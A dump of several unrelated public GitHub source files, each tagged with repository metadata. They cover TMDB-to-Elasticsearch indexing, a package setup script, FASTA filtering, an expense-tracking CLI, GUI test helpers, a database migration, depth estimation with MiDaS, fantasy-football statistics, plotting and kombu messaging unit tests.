self.index_record(index=self.config["search_index"], record=record, recordId=recordId)
else:
logging.debug("Already searched title {} ({}) ({})".format(title, year, self.config["title_type"]))
def get_image_url(self, image):
if "http" not in image:
return "{}/{}".format(self.config["image_base_url"], image)
else:
return image
def check_for_dup(self, title, alias, orgTitle=""):
if title == "":
return False
if alias:
for altTitle in alias + [orgTitle]:
if re.search("^{}$".format(re.escape(title)), altTitle, flags=re.IGNORECASE):
return False
else:
return True
if orgTitle:
if re.search("^{}$".format(re.escape(title)), orgTitle, flags=re.IGNORECASE):
return False
return True
def render_template(self, record, template):
if template == "description":
return self.description_template.render(record=record)
elif template == "subtitle":
return self.subtitle_template.render(record=record)
def check_index(self, indexName, indexMappingFile):
if not self.es.indices.exists(index=indexName):
with open(os.path.join(os.path.dirname(__file__), "index_mapping", indexMappingFile), "r") as mappingFile:
indexSettings = mappingFile.read()
response = self.es.indices.create(index=indexName, body=indexSettings)
if response["acknowledged"]:
logging.info("Created {} index".format(indexName))
def get_record_by_query(self, index, query, refreshIndex=True):
if refreshIndex:
self.es.indices.refresh(index=index)
return self.es.search(index=index, body=query)
def index_record(self, index, record, recordId=None):
record["@timestamp"] = datetime.datetime.utcnow().isoformat()
self.es.index(index=index, id=recordId, body=record)
def check_update_required(self, timestamp):
timestamp = datetime.datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%f")
if timestamp < datetime.datetime.utcnow() - datetime.timedelta(days=self.config["refresh_after_days"]) or timestamp <= self.config["refresh_if_older"]:
return True
else:
return False
def cache_configuration(self):
self.genres = {}
self.countries = {}
self.countryCodes = {}
self.languages = {}
genres = self.send_request_get(endPoint="genre/{}/list".format(self.config["title_type"]))
if genres:
for genre in genres["genres"]:
self.genres[genre["id"]] = genre["name"]
countries = self.send_request_get(endPoint="configuration/countries")
if countries:
for country in countries:
self.countries[country["iso_3166_1"]] = country["english_name"]
self.countryCodes[country["english_name"]] = country["iso_3166_1"]
languages = self.send_request_get(endPoint="configuration/languages")
if languages:
for language in languages:
self.languages[language["iso_639_1"]] = language["english_name"]
backgroundUrl = self.send_request_get(endPoint="configuration")
if backgroundUrl:
self.config["image_base_url"] = backgroundUrl["images"]["base_url"]
self.config["image_base_url"] += self.config["tmdb_image_type"]
|
shaunschembri/ElasticTMDB
|
elastictmdb/__init__.py
|
__init__.py
|
py
| 27,602 |
python
|
en
|
code
| 4 |
github-code
|
6
|
26126736743
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
# Imports
import io
from setuptools import setup, find_packages
# Readme file
with io.open('README.rst', encoding='utf-8') as readme_file:
readme = readme_file.read()
# ChangeLog file
with io.open('HISTORY.rst', encoding='utf-8') as history_file:
history = history_file.read()
# Requirements Variable
requirements: list = [
# Package Requirements
'sentry_sdk',
'pytest',
]
# Setup Requirements Variable
setup_requirements: list = [
# Setup Requirements
]
# Test Requirements Variable
test_requirements: list = [
# Test Requirements
'pylint',
'pytest',
'coverage'
]
setup(
# Name of Package
name='pwbs',
# Version following SemVer Style
version='0.5.0-dev2',
# Description of the Package
description='PWBS is Build System for easy automation process.',
# Description of the Package to show on PyPi (Longer Description)
long_description=readme + '\n\n' + history,
# The Project Mainpage [For that project for now is just repository]
url='https://gitlab.com/paip-web/pwbs',
# Author Details
author='Patryk Adamczyk',
author_email='[email protected]',
# License
license='MIT',
# Classifiers of the Project
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 'Development Status :: 1 - Planning'
# 'Development Status :: 2 - Pre-Alpha'
# 'Development Status :: 3 - Alpha'
# 'Development Status :: 4 - Beta'
# 'Development Status :: 5 - Production/Stable'
# 'Development Status :: 6 - Mature'
# 'Development Status :: 7 - Inactive'
'Development Status :: 2 - Pre-Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: System Administrators',
# Topic
'Topic :: Software Development',
'Topic :: Software Development :: Build Tools',
'Topic :: Utilities',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3 :: Only',
'Operating System :: OS Independent',
'Operating System :: Microsoft :: Windows',
'Operating System :: Microsoft :: Windows :: Windows 7',
'Operating System :: Microsoft :: Windows :: Windows 10',
'Operating System :: POSIX :: Linux',
'Environment :: Console'
],
# Keywords of your Project
keywords='development build tools task runner',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
# packages=["pwbs"],
# packages=find_packages(exclude=['docs', 'tests*']),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# Dependencies of the Project
install_requires=requirements,
tests_require=test_requirements,
setup_requires=setup_requirements,
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'setup': ["wheel", "twine", "collective.checkdocs"],
'test': ['pylint', 'pytest', 'coverage'],
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
# package_data={
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'pwbs=pwbs:main',
],
},
# Python Required Version for the package
python_requires='~=3.6',
)
|
paip-web/pwbs
|
setup.py
|
setup.py
|
py
| 4,954 |
python
|
en
|
code
| 2 |
github-code
|
6
|
42793161783
|
import sys
blastfile = open(sys.argv[1], 'r')
earlyfasta = open(sys.argv[2], 'r')
latefasta = open(sys.argv[3], 'r')
earlycore = open(sys.argv[4], 'w')
latecore = open(sys.argv[5], 'w')
late = []
early = []
def get_next_fasta (fileObject):
'''usage: for header, seq in get_next_fasta(fileObject):
'''
header = ''
seq = ''
#The following for loop gets the header of the first fasta
#record. Skips any leading junk in the file
for line in fileObject:
if line.startswith('>'):
header = line.strip()
break
for line in fileObject:
if line.startswith('>'):
yield header, seq
header = line.strip()
seq = ''
else:
seq += line.strip()
#yield the last entry
if header:
yield header, seq
for line in blastfile:
line = line.split()
late.append(line[0])
early.append(line[1])
for header, seq in get_next_fasta(earlyfasta):
if header[1:].strip() in early:
earlycore.write("%s\n%s\n" % (header, seq))
for header, seq in get_next_fasta(latefasta):
if header[1:].strip() in late:
latecore.write("%s\n%s\n" % (header, seq))
|
kdiverson/seqTools
|
getcoregenes.py
|
getcoregenes.py
|
py
| 1,209 |
python
|
en
|
code
| 3 |
github-code
|
6
|
71133520507
|
from Logic.Crud import *
from Logic.Operatii import *
import datetime
def arata_meniu():
'''
:return: optiunile din meniu
'''
print("1.Adaugare cheltuiala")
print("2.Stergere cheltuiala")
print("3.Modificare cheltuiala")
print("4.Stergerea cheltuielilor pentru un nr de apartament")
print("5.Adaugre suma pentru toate cheltuielile dintr-o data citita de la tastatura")
print("6.Afisarea cheltuielilor cu suma cea mai mare pentru fiecare tip")
print("7.Ordonarea cheltuielilor crescator dupa suma")
print("8.Afisarea sumelor lunare pentru fiecare apartament")
print("9.Afisare lista")
print("10.Undo")
print("11.Redo")
print("0.Iesire")
def citire_data():
date_str=input("Dati data separate prin spatiu")
data=date_str.split(" ")
an=int(data[0])
luna=int(data[1])
zi=int(data[2])
return datetime.date(an,luna,zi)
def afisare_adaugare(lista,lst_undo,lst_redo):
"""
:param lista: lista cu cheltuielei
:return: se adauga cheltuiala creata in logic
"""
try:
id=int(input("Dati id :"))
nr_apartament = int(input('Dati nr apartamentului : '))
suma = float(input('Dati suma: '))
data = input("Dati data separata prin - :")
tipul = input("Dati tipul:")
return adaugare_cheltuiala(lista, id, nr_apartament, suma, data, tipul,lst_undo,lst_redo)
except ValueError as ve:
print("Eroare",ve)
return lista
def afisare_stergere(lista,lst_undo,lst_redo):
'''
:param lista: o lista cu cheltuieli
:return: se sterge o cheltuiala din lista
'''
try:
nr_apartament = int(input("Dati nr apartamentului care va fi sters"))
return stergere_cheltuiala(nr_apartament, lista,lst_undo,lst_redo)
except ValueError as ve:
print("Eroare",ve)
return lista
def afisare_modificare(lista,lst_undo,lst_redo):
'''
:param lista:lista de cheltuieli
:return: se modifica lista
'''
try:
id=int(input("Dati id "))
nr_apartament =int(input('Dati nr apartamentului de modificat: '))
suma = float(input('Dati suma: '))
data = input("Dati data separata prin -:")
tipul = input('Dati tipul: ')
return modificare_cheltuiala(lista,id, nr_apartament, suma, data, tipul,lst_undo,lst_redo)
except ValueError as ve:
print("Eroare",ve)
return lista
def afisare_stergere_cheltuiala_nr_apartament(lista,lst_undo,lst_redo):
'''
Se sterge ultima cheltuiala care are un nr de apartament dat
:param lista: lista de cheltuieli
:return: lista cu cheltuielile ramase
'''
nr_apartament=int(input("Introduceti nr de apartament:"))
return stergere_cheltuieli_pentru_un_apartament(lista,nr_apartament,lst_undo,lst_redo)
def afisare_adaugare_valoare_la_toate_cheltuielile(lista,lst_redo,lst_undo):
'''
:param lista: lista de cheltuieli
:return: se modifica lista cu cerintele din enunt
'''
dat= input("Dati data separata prin -:")
sum = int(input("Dati suma:"))
cheltuieli_lista = adunare_valoare_la_toate_cheltuielile(lista,dat,sum,lst_undo,lst_redo)
return cheltuieli_lista
def afisare_maxim_cheltuieli_pentru_fiecare_tip(lista):
tip_cheltuieli=max_cheltuiala_pentru_fiecare_tip(lista)
for tipul,cheltuiala in tip_cheltuieli.items():
print("{} : {}".format(tipul,cheltuiala))
def afisare_sume_lunare_cheltuieli(lista):
result = sume_lunare(lista)
for luna in result:
print(f'Pentru Luna {luna} avem lista de sume: {result[luna]}')
def afisare_lista(lista):
for cheltuiala in lista:
print(to_string(cheltuiala))
def afisare_undo(lista, lst_undo, lst_redo):
undo_result = undo(lista, lst_undo, lst_redo)
if undo_result is not None:
return undo_result
return lista
def afisare_redo(lista, lst_undo, lst_redo):
redo_result = redo(lista, lst_undo, lst_redo)
if redo_result is not None:
return redo_result
return lista
def interfata(lista,lst_undo,lst_redo):
"""meniulde comanda"""
while True:
arata_meniu()
op=int(input("Alegeti optiunea"))
if op == 1:
lista=afisare_adaugare(lista,lst_undo,lst_redo)
if op==2:
lista=afisare_stergere(lista,lst_undo,lst_redo)
if op==3:
lista=afisare_modificare(lista,lst_undo,lst_redo)
if op==4:
lista=afisare_stergere_cheltuiala_nr_apartament(lista,lst_undo,lst_redo)
if op==5:
lista=afisare_adaugare_valoare_la_toate_cheltuielile(lista,lst_undo,lst_redo)
if op ==6:
print(max_cheltuiala_pentru_fiecare_tip(lista))
if op ==7:
lista = ordonare_cheltuieli_dupa_suma(lista,lst_undo,lst_redo)
if op==8:
afisare_sume_lunare_cheltuieli(lista)
if op == 9:
afisare_lista(lista)
if op ==10:
lista=afisare_undo(lista,lst_undo,lst_redo)
if op==11:
lista=afisare_redo(lista,lst_undo,lst_redo)
if op == 0:
break
else:
print("Invalid")
|
AP-MI-2021/lab-567-Pop-Sergiu-Adrian
|
lab5/Ui/Interfata.py
|
Interfata.py
|
py
| 5,122 |
python
|
es
|
code
| 0 |
github-code
|
6
|
30358044871
|
import wx
from traitsui.wx.check_list_editor import CustomEditor
from traitsui.testing.tester.command import MouseClick
from traitsui.testing.tester.locator import Index
from traitsui.testing.tester._ui_tester_registry._common_ui_targets import (
BaseSourceWithLocation,
)
from traitsui.testing.tester._ui_tester_registry._layout import (
column_major_to_row_major,
)
from traitsui.testing.tester._ui_tester_registry.wx import _interaction_helpers
class _IndexedCustomCheckListEditor(BaseSourceWithLocation):
"""Wrapper for CheckListEditor + Index"""
source_class = CustomEditor
locator_class = Index
handlers = [
(
MouseClick,
(
lambda wrapper, _: _interaction_helpers.mouse_click_checkbox_child_in_panel(
control=wrapper._target.source.control,
index=convert_index(
source=wrapper._target.source,
index=wrapper._target.location.index,
),
delay=wrapper.delay,
)
),
),
]
def convert_index(source, index):
"""Helper function to convert an index for a GridSizer so that the
index counts over the grid in the correct direction.
The grid is always populated in row major order, however, the elements
are assigned to each entry in the grid so that when displayed they appear
in column major order.
Sizers are indexed in the order they are populated, so to access
the correct element we may need to convert a column-major based index
into a row-major one.
Parameters
----------
control : CustomEditor
The Custom CheckList Editor of interest. Its control is the wx.Panel
containing child objects organized with a wx.GridSizer
index : int
the index of interest
"""
sizer = source.control.GetSizer()
if isinstance(sizer, wx.BoxSizer):
return index
n = len(source.names)
num_cols = sizer.GetCols()
num_rows = sizer.GetEffectiveRowsCount()
return column_major_to_row_major(index, n, num_rows, num_cols)
def register(registry):
"""Register interactions for the given registry.
If there are any conflicts, an error will occur.
Parameters
----------
registry : TargetRegistry
The registry being registered to.
"""
_IndexedCustomCheckListEditor.register(registry)
|
enthought/traitsui
|
traitsui/testing/tester/_ui_tester_registry/wx/_traitsui/check_list_editor.py
|
check_list_editor.py
|
py
| 2,444 |
python
|
en
|
code
| 290 |
github-code
|
6
|
5093704747
|
"""empty message
Revision ID: b3ff59df2833
Revises: fee4d1b1d192
Create Date: 2022-04-08 07:33:52.082355
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = 'b3ff59df2833'
down_revision = 'fee4d1b1d192'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('product', 'image',
existing_type=mysql.VARCHAR(length=200),
type_=sa.String(length=20000),
existing_nullable=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('product', 'image',
existing_type=sa.String(length=20000),
type_=mysql.VARCHAR(length=200),
existing_nullable=True)
# ### end Alembic commands ###
|
sudiptob2/microserve-main
|
migrations/versions/b3ff59df2833_.py
|
b3ff59df2833_.py
|
py
| 934 |
python
|
en
|
code
| 1 |
github-code
|
6
|
20040106137
|
string = 'THis iS AN ExamPLe'
command = 'CAPitalize'
def string_op(string, command):
command_list = ['upper','lower','capitalize']
command_low = command.lower()
nw_str = []
if command_low not in command_list:
nw_str = "Invalid command!"
elif command_low == 'upper':
nw_str = string.upper()
elif command_low == 'lower':
nw_str = string.lower()
else:
nw_str = string.capitalize()
return nw_str
print(string_op(string, command))
|
mwboiss/DSI-Prep
|
inter_py/string_op.py
|
string_op.py
|
py
| 491 |
python
|
en
|
code
| 0 |
github-code
|
6
|
12769514952
|
import cv2
from cv2 import waitKey
import torch
import urllib.request
import os
import matplotlib.pyplot as plt
print(torch.__version__)
os.environ["KMP_DUPLICATE_LIB_OK"] = "TRUE"
# url, filename = ("https://github.com/pytorch/hub/raw/master/images/dog.jpg", "dog.jpg")
# urllib.request.urlretrieve(url, filename)
model_type = "DPT_Large" # MiDaS v3 - Large (highest accuracy, slowest inference speed)
#model_type = "DPT_Hybrid" # MiDaS v3 - Hybrid (medium accuracy, medium inference speed)
#model_type = "MiDaS_small" # MiDaS v2.1 - Small (lowest accuracy, highest inference speed)
midas = torch.hub.load("intel-isl/MiDaS", model_type)
# change to gpu
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
midas.to(device)
midas.eval()
# Load transforms to resize and normalize the image for large or small model
midas_transforms = torch.hub.load("intel-isl/MiDaS", "transforms")
if model_type == "DPT_Large" or model_type == "DPT_Hybrid":
transform = midas_transforms.dpt_transform
else:
transform = midas_transforms.small_transform
# Load image and apply transforms
filename = '1646652789610919952.jpg'
img = cv2.imread(filename)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
input_batch = transform(img).to(device)
# Predict and resize to original resolution
with torch.no_grad():
prediction = midas(input_batch)
prediction = torch.nn.functional.interpolate(
prediction.unsqueeze(1),
size=img.shape[:2],
mode="bicubic",
align_corners=False
).squeeze()
output = prediction.cpu().numpy()
plt.imshow(output)
plt.show()
|
JohnLee16/InfraredImage2Depth
|
src/midas_depth.py
|
midas_depth.py
|
py
| 1,628 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23934349151
|
from pymongo import MongoClient
import pprint
import statistics
client = MongoClient('mongodb://localhost:27017/')
db = client.fantasypros
def find():
players = db.playersbywk.distinct("name")
for player in players:
getstats(player)
def getstats(player):
points = []
player_position = ''
projection = {"_id": 0, "total_points": 1, "position": 1}
query = {'name': player}
player_details = db.playersbywk.find(query, projection)
for player_detail in player_details:
points.append(player_detail['total_points'])
player_position = player_detail['position']
savestats(player, points, player_position)
def savestats(player, points, player_position):
player_dict = {}
player_dict['name'] = player
print("Player: " + player)
player_dict['position'] = player_position
print("Position: " + player_position)
player_dict['mean'] = str(statistics.mean(points))
print("Mean is: " + str(statistics.mean(points)))
if len(points) >= 2:
player_dict['stdev'] = str(statistics.stdev(points))
print("Standard Deviation is: " + str(statistics.stdev(points)))
if statistics.mean(points) != 0 and len(points) >= 2:
player_dict['coeff_var'] = str(statistics.stdev(points)/statistics.mean(points))
print("Coefficient of Variance is: " + str(statistics.stdev(points)/statistics.mean(points)))
print("Number of games: " + str(len(points)))
player_dict['num_of_games'] = str(len(points))
db.players.insert(player_dict)
if __name__ == '__main__':
find()
|
soboy2/pyrandom
|
fbstats.py
|
fbstats.py
|
py
| 1,583 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20869059181
|
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.cm as cm
import matplotlib
import random
vida=[]
defesa=[]
ataque=[]
#Spearador de Dados
def separador_atributos(arquivo):
vida_max=0
vida_min=18
def_max=0
def_min=18
atk_max=0
atk_min=18
numero_pontos=0
linha=arquivo.readline()
while linha:
atributos=linha.split()
#transfere para txt
vida.append(int(atributos[0]))
if(int(atributos[0])>vida_max):
vida_max=int(atributos[0])
if(int(atributos[0])<vida_min):
vida_min=int(atributos[0])
defesa.append(int(atributos[1]))
if(int(atributos[1])>def_max):
def_max=int(atributos[1])
if(int(atributos[1])<def_min):
def_min=int(atributos[1])
ataque.append(int(atributos[2]))
if(int(atributos[2])>atk_max):
atk_max=int(atributos[2])
if(int(atributos[2])<atk_min):
atk_min=int(atributos[2])
numero_pontos+=1
linha=arquivo.readline()
arquivo.close()
return(vida_max, vida_min, def_max, def_min, atk_max, atk_min, numero_pontos)
def frequencia_absoluta(atributo ,atributo_max, atributo_min, numero_pontos):
num_atributo=[0]*18
maior_F=0
for i in range((atributo_max-atributo_min)+1): #verifica todos valores de atributo
for j in range(numero_pontos): #varre todo os pontos
if(atributo[j]==(i+1)): #se a atributo bater com a que esta sendo avaliada
num_atributo[i]+=((1/numero_pontos)) #armazena vetor def atk para atributo=[i]
if(num_atributo[i]>maior_F):
maior_F=num_atributo[i]
return(num_atributo)
def ajuste_cmap(frequencia_vida, frequencia_def, frequencia_atk, numero_pontos):
c=[]
for i in range(numero_pontos):
c.append((frequencia_vida[(vida[i]-1)])*(frequencia_def[(defesa[i]-1)])*(frequencia_atk[(ataque[i]-1)]))
return(c)
def modelo_calculado():
modelo=open("../modelo.txt", "r")
linha=modelo.readline()
coeficientes=linha.split()
atk_amostras=[0]*1000
def_amostras=[0]*1000
vida_amostras=[0]*1000
for i in range(1000):
if (int(coeficientes[5])>=1):
def_amostras[i]=np.random.randint(int(coeficientes[5], int(coeficientes[6])))
else:
def_amostras[i]=np.random.randint((int(coeficientes[5])+1), int(coeficientes[6])+2)-1
vida_amostras[i]=np.random.randint(int(coeficientes[3]), int(coeficientes[4])+1)
#calcula atk
atk_amostras[i]=((vida_amostras[i]-float(coeficientes[0])-(float(coeficientes[1])*def_amostras[i]))/float(coeficientes[2]))
return(def_amostras, atk_amostras, vida_amostras)
#recolhe dados
arquivo=open("../dados/vencedor.txt", "r")
vida_max, vida_min, def_max, def_min, atk_max, atk_min, numero_pontos=separador_atributos(arquivo)
frequencia_vida=frequencia_absoluta(vida ,vida_max, vida_min, numero_pontos)
frequencia_def=frequencia_absoluta(defesa ,def_max, def_min, numero_pontos)
frequencia_atk=frequencia_absoluta(ataque ,atk_max, atk_min, numero_pontos)
c=ajuste_cmap(frequencia_vida, frequencia_def, frequencia_atk, numero_pontos)
def_amostras, atk_amostras, vida_amostras=modelo_calculado()
#plotando
fig=plt.figure()
ax=fig.add_subplot(111, projection='3d')
ax.text2D(0.05, 0.95, "Dispersao & Concentração Atributos(Vencedores)", transform=ax.transAxes)
ax.scatter(defesa, ataque, vida, cmap="cool", c=c)
ax.plot_trisurf(def_amostras, atk_amostras, vida_amostras, color="red")
ax.set_xlabel("Defesa",fontsize=13)
ax.set_ylabel("Ataque",fontsize=13)
ax.set_zlabel("Vida",fontsize=13)
#ax.legend(loc=3, bbox_to_anchor=(-0.5, -0.1))
#saida
ax.view_init(elev=30, azim=45)
fig=plt.gcf()
fig.savefig("dispersao_concentraca_atributos_entre_vencedores1.png", format='png')
ax.view_init(elev=30, azim=-20)
fig=plt.gcf()
fig.savefig("dispersao_concentraca_atributos_entre_vencedores2.png", format='png')
ax.view_init(elev=15, azim=-50)
fig=plt.gcf()
fig.savefig("dispersao_concentraca_atributos_entre_vencedores3.png", format='png')
|
Edumarek123/Machine_Learning
|
graficos/graficos_dispersao.py
|
graficos_dispersao.py
|
py
| 4,235 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
8267902176
|
from __future__ import annotations
import pickle
import sys
from collections import defaultdict
from unittest.mock import Mock, patch
import pytest
from kombu import Connection, Consumer, Exchange, Producer, Queue
from kombu.exceptions import MessageStateError
from kombu.utils import json
from kombu.utils.functional import ChannelPromise
from t.mocks import Transport
class test_Producer:
def setup(self):
self.exchange = Exchange('foo', 'direct')
self.connection = Connection(transport=Transport)
self.connection.connect()
assert self.connection.connection.connected
assert not self.exchange.is_bound
def test_repr(self):
p = Producer(self.connection)
assert repr(p)
def test_pickle(self):
chan = Mock()
producer = Producer(chan, serializer='pickle')
p2 = pickle.loads(pickle.dumps(producer))
assert p2.serializer == producer.serializer
def test_no_channel(self):
p = Producer(None)
assert not p._channel
@patch('kombu.messaging.maybe_declare')
def test_maybe_declare(self, maybe_declare):
p = self.connection.Producer()
q = Queue('foo')
p.maybe_declare(q)
maybe_declare.assert_called_with(q, p.channel, False)
@patch('kombu.common.maybe_declare')
def test_maybe_declare_when_entity_false(self, maybe_declare):
p = self.connection.Producer()
p.maybe_declare(None)
maybe_declare.assert_not_called()
def test_auto_declare(self):
channel = self.connection.channel()
p = Producer(channel, self.exchange, auto_declare=True)
# creates Exchange clone at bind
assert p.exchange is not self.exchange
assert p.exchange.is_bound
# auto_declare declares exchange'
assert 'exchange_declare' not in channel
p.publish('foo')
assert 'exchange_declare' in channel
def test_manual_declare(self):
channel = self.connection.channel()
p = Producer(channel, self.exchange, auto_declare=False)
assert p.exchange.is_bound
# auto_declare=False does not declare exchange
assert 'exchange_declare' not in channel
# p.declare() declares exchange')
p.declare()
assert 'exchange_declare' in channel
def test_prepare(self):
message = {'the quick brown fox': 'jumps over the lazy dog'}
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
m, ctype, cencoding = p._prepare(message, headers={})
assert json.loads(m) == message
assert ctype == 'application/json'
assert cencoding == 'utf-8'
def test_prepare_compression(self):
message = {'the quick brown fox': 'jumps over the lazy dog'}
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
headers = {}
m, ctype, cencoding = p._prepare(message, compression='zlib',
headers=headers)
assert ctype == 'application/json'
assert cencoding == 'utf-8'
assert headers['compression'] == 'application/x-gzip'
import zlib
assert json.loads(zlib.decompress(m).decode('utf-8')) == message
def test_prepare_custom_content_type(self):
message = b'the quick brown fox'
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
m, ctype, cencoding = p._prepare(message, content_type='custom')
assert m == message
assert ctype == 'custom'
assert cencoding == 'binary'
m, ctype, cencoding = p._prepare(message, content_type='custom',
content_encoding='alien')
assert m == message
assert ctype == 'custom'
assert cencoding == 'alien'
def test_prepare_is_already_unicode(self):
message = 'the quick brown fox'
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
m, ctype, cencoding = p._prepare(message, content_type='text/plain')
assert m == message.encode('utf-8')
assert ctype == 'text/plain'
assert cencoding == 'utf-8'
m, ctype, cencoding = p._prepare(message, content_type='text/plain',
content_encoding='utf-8')
assert m == message.encode('utf-8')
assert ctype == 'text/plain'
assert cencoding == 'utf-8'
def test_publish_with_Exchange_instance(self):
p = self.connection.Producer()
p.channel = Mock()
p.channel.connection.client.declared_entities = set()
p.publish('hello', exchange=Exchange('foo'), delivery_mode='transient')
assert p._channel.basic_publish.call_args[1]['exchange'] == 'foo'
def test_publish_with_expiration(self):
p = self.connection.Producer()
p.channel = Mock()
p.channel.connection.client.declared_entities = set()
p.publish('hello', exchange=Exchange('foo'), expiration=10)
properties = p._channel.prepare_message.call_args[0][5]
assert properties['expiration'] == '10000'
def test_publish_with_timeout(self):
p = self.connection.Producer()
p.channel = Mock()
p.channel.connection.client.declared_entities = set()
p.publish('test_timeout', exchange=Exchange('foo'), timeout=1)
timeout = p._channel.basic_publish.call_args[1]['timeout']
assert timeout == 1
def test_publish_with_reply_to(self):
p = self.connection.Producer()
p.channel = Mock()
p.channel.connection.client.declared_entities = set()
assert not p.exchange.name
p.publish('hello', exchange=Exchange('foo'), reply_to=Queue('foo'))
properties = p._channel.prepare_message.call_args[0][5]
assert properties['reply_to'] == 'foo'
def test_set_on_return(self):
chan = Mock()
chan.events = defaultdict(Mock)
p = Producer(ChannelPromise(lambda: chan), on_return='on_return')
p.channel
chan.events['basic_return'].add.assert_called_with('on_return')
def test_publish_retry_calls_ensure(self):
p = Producer(Mock())
p._connection = Mock()
p._connection.declared_entities = set()
ensure = p.connection.ensure = Mock()
p.publish('foo', exchange='foo', retry=True)
ensure.assert_called()
def test_publish_retry_with_declare(self):
p = self.connection.Producer()
p.maybe_declare = Mock()
p.connection.ensure = Mock()
ex = Exchange('foo')
p._publish('hello', 0, '', '', {}, {}, 'rk', 0, 0, ex, declare=[ex])
p.maybe_declare.assert_called_with(ex)
def test_revive_when_channel_is_connection(self):
p = self.connection.Producer()
p.exchange = Mock()
new_conn = Connection('memory://')
defchan = new_conn.default_channel
p.revive(new_conn)
assert p.channel is defchan
p.exchange.revive.assert_called_with(defchan)
def test_enter_exit(self):
p = self.connection.Producer()
p.release = Mock()
with p as x:
assert x is p
p.release.assert_called_with()
def test_connection_property_handles_AttributeError(self):
p = self.connection.Producer()
p.channel = object()
p.__connection__ = None
assert p.connection is None
def test_publish(self):
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
message = {'the quick brown fox': 'jumps over the lazy dog'}
ret = p.publish(message, routing_key='process')
assert 'prepare_message' in channel
assert 'basic_publish' in channel
m, exc, rkey = ret
assert json.loads(m['body']) == message
assert m['content_type'] == 'application/json'
assert m['content_encoding'] == 'utf-8'
assert m['priority'] == 0
assert m['properties']['delivery_mode'] == 2
assert exc == p.exchange.name
assert rkey == 'process'
def test_no_exchange(self):
chan = self.connection.channel()
p = Producer(chan)
assert not p.exchange.name
def test_revive(self):
chan = self.connection.channel()
p = Producer(chan)
chan2 = self.connection.channel()
p.revive(chan2)
assert p.channel is chan2
assert p.exchange.channel is chan2
def test_on_return(self):
chan = self.connection.channel()
def on_return(exception, exchange, routing_key, message):
pass
p = Producer(chan, on_return=on_return)
assert on_return in chan.events['basic_return']
assert p.on_return
class test_Consumer:
def setup(self):
self.connection = Connection(transport=Transport)
self.connection.connect()
assert self.connection.connection.connected
self.exchange = Exchange('foo', 'direct')
def test_accept(self):
a = Consumer(self.connection)
assert a.accept is None
b = Consumer(self.connection, accept=['json', 'pickle'])
assert b.accept == {
'application/json', 'application/x-python-serialize',
}
c = Consumer(self.connection, accept=b.accept)
assert b.accept == c.accept
def test_enter_exit_cancel_raises(self):
c = Consumer(self.connection)
c.cancel = Mock(name='Consumer.cancel')
c.cancel.side_effect = KeyError('foo')
with c:
pass
c.cancel.assert_called_with()
def test_enter_exit_cancel_not_called_on_connection_error(self):
c = Consumer(self.connection)
c.cancel = Mock(name='Consumer.cancel')
assert self.connection.connection_errors
with pytest.raises(self.connection.connection_errors[0]):
with c:
raise self.connection.connection_errors[0]()
c.cancel.assert_not_called()
def test_receive_callback_accept(self):
message = Mock(name='Message')
message.errors = []
callback = Mock(name='on_message')
c = Consumer(self.connection, accept=['json'], on_message=callback)
c.on_decode_error = None
c.channel = Mock(name='channel')
c.channel.message_to_python = None
c._receive_callback(message)
callback.assert_called_with(message)
assert message.accept == c.accept
def test_accept__content_disallowed(self):
conn = Connection('memory://')
q = Queue('foo', exchange=self.exchange)
p = conn.Producer()
p.publish(
{'complex': object()},
declare=[q], exchange=self.exchange, serializer='pickle',
)
callback = Mock(name='callback')
with conn.Consumer(queues=[q], callbacks=[callback]) as consumer:
with pytest.raises(consumer.ContentDisallowed):
conn.drain_events(timeout=1)
callback.assert_not_called()
def test_accept__content_allowed(self):
conn = Connection('memory://')
q = Queue('foo', exchange=self.exchange)
p = conn.Producer()
p.publish(
{'complex': object()},
declare=[q], exchange=self.exchange, serializer='pickle',
)
callback = Mock(name='callback')
with conn.Consumer(queues=[q], accept=['pickle'],
callbacks=[callback]):
conn.drain_events(timeout=1)
callback.assert_called()
body, message = callback.call_args[0]
assert body['complex']
def test_set_no_channel(self):
c = Consumer(None)
assert c.channel is None
c.revive(Mock())
assert c.channel
def test_set_no_ack(self):
channel = self.connection.channel()
